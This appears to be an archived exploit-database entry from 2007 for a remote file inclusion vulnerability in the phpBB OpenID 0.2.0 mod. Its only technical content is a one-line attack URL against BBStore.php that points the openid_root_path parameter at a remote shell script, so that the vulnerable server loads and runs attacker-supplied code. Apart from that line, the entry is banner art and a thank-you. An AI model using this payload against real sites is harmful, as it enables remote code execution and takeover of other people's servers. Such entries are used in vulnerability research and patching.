id: 2182
date: 09/29/2007
title: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln
author: xoron
cves: 

=============================================================
phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln
=============================================================



============================================
=                                          =
=             XORON  (c) 2007              =
=                                          =
============================================
=                                          =
=  phpBB Openid 0.2.0 Remote File Include  =
=                                          =
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
=                                          =
=      Special thanks "k1tkat"  :)         =
=                                          =
============================================ 



#  0day.today [2023-03-24]  #